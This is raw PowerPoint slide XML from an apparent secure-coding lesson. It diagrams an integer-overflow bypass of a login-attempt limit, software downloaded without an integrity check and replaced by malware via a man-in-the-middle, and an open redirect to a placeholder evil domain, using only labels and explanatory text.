          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901951" y="2530923"/>
            <a:ext cx="960391" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3792179-92D7-6644-AC31-51BCECF7819A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278391" y="2852184"/>
            <a:ext cx="8744" cy="3191971"/>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8176AA-094B-F244-B97D-1FBFB393545B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3909086" y="2854903"/>
            <a:ext cx="8745" cy="3189252"/>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875C25-21CD-AC40-9111-CF4E82AD3D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278391" y="3234228"/>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58890C-67DD-1643-A349-C9C13E2409BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394407" y="2904485"/>
            <a:ext cx="1240724" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635586E9-D527-0C40-AFDA-BEFC94FC93EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1270136" y="3248765"/>
            <a:ext cx="2647695" cy="853538"/>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D4E3D0-7267-8044-B04A-CF20ED52244E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570414">
            <a:off x="1254250" y="3517724"/>
            <a:ext cx="1731308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account Locked!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7A466A-C7AF-0042-A900-23DFAA052A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271139" y="4127355"/>
            <a:ext cx="2646692"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F86957-8B5C-D54E-AED0-6EC770AAC8AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394407" y="3800999"/>
            <a:ext cx="1240724" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047D1613-AB66-864E-AB5C-0D75CA3F089D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269647" y="4158246"/>
            <a:ext cx="2639439" cy="868135"/>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F45333-CE45-3A4F-8D50-4ED27F2575E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563066">
            <a:off x="1254048" y="4420153"/>
            <a:ext cx="1731308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account Locked!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B81FA10-4CEB-CE4D-BEF1-E8A47358EB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392248" y="2512435"/>
            <a:ext cx="373308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAEFBA92-A614-0E42-A65B-61A6DD093CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1287136" y="5035245"/>
            <a:ext cx="2630695"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B38CB2-A7DD-BD42-B4CA-FB63B60ADB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394407" y="4698399"/>
            <a:ext cx="1240724" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Arrow Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F215BD8F-F798-F449-A53C-628201CF1B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269647" y="5080681"/>
            <a:ext cx="2639439" cy="768156"/>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9A6FF4D-F96F-1E46-BA81-19B3E796AF71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638428">
            <a:off x="1219713" y="5280093"/>
            <a:ext cx="1825756" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Login authorized!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882657D0-7C0E-3F4F-AEA0-3294BE280A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084023" y="3942689"/>
            <a:ext cx="3570849" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ttempts = 32767 (MAX_SHORT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374DB7A3-2970-7048-A400-E71BD3F0E437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084023" y="4850579"/>
            <a:ext cx="4276748" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ttempts = -32768 (&lt; MAX_ATTEMPTS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85077D48-CBC1-E243-B376-9523BB2C404E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4117524" y="3054395"/>
            <a:ext cx="2004075" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>attempts = 32766</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06201164-53DE-DB4F-819D-BC7D15D906A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8360771" y="1646559"/>
            <a:ext cx="3367763" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>Code that makes a security decision based on a comparison, is bypassed when a counter exceeds the maximum boundary and resets to negative.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15746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urved Connector 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51715C61-952D-8E41-95AA-3E098908E3FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="5"/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116212" y="2159140"/>
            <a:ext cx="12700" cy="3012165"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26443299"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="1238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19F278-5918-4844-9360-D0F6379D5377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851197" y="59092"/>
            <a:ext cx="11302702" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download of Code Without Integrity Check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cube 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8744EB57-9B28-1E47-9B45-665580CDC03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245654" y="1602634"/>
            <a:ext cx="870558" cy="1330651"/>
          </a:xfrm>
          <a:prstGeom prst="cub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135DD-8E7A-8041-9988-8EFDED0629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3555739" y="1881409"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2602973-A5BC-3E44-AA7D-E379A474E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712" y="4695055"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D85590B4-4ED1-FF48-9D1D-82FDFE5F903B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331223" y="5654250"/>
            <a:ext cx="617477" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26BCB06-6F8D-9942-B678-33D0B5995107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398690" y="2754246"/>
            <a:ext cx="1025474" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Graphic 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75A33F9F-A32F-E540-A42C-9D07A416B9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1836" y="3188972"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C38ED64E-B341-1642-843D-A9FBF87B9F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3555739" y="4478508"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66EA79ED-CBF7-BB49-8052-48FFDEC69A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3405904" y="5325849"/>
            <a:ext cx="1011046" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD9CB3F3-206D-4946-8128-7B6D87BE8FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="979584" y="2939980"/>
            <a:ext cx="1849161" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Not Secure)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298FAB52-A2FE-9848-AE0A-ECC0CA43FFA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377739" y="3300489"/>
            <a:ext cx="955682" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E5D42B-F0A4-074E-ADA9-B2DEE7F567F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6745188" y="1423653"/>
            <a:ext cx="4731510" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>When software is downloaded, especially over an insecure connection, it may be replaced with malware. If an integrity check is not used to verify the file checksum the user will end up executing the replacement.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231638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676400" y="568957"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Redirect</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4230441" y="1460277"/>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915106" y="2275091"/>
            <a:ext cx="1950840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.trusted.good</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD39C724-D387-0645-AD03-15F0B8D33AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840168" y="2330822"/>
            <a:ext cx="1507951" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.evil.bad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441" y="3651660"/>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410453" y="3469666"/>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181420" y="4604160"/>
            <a:ext cx="1050542" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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5400000" flipH="1" flipV="1">
            <a:off x="1475993" y="3055134"/>
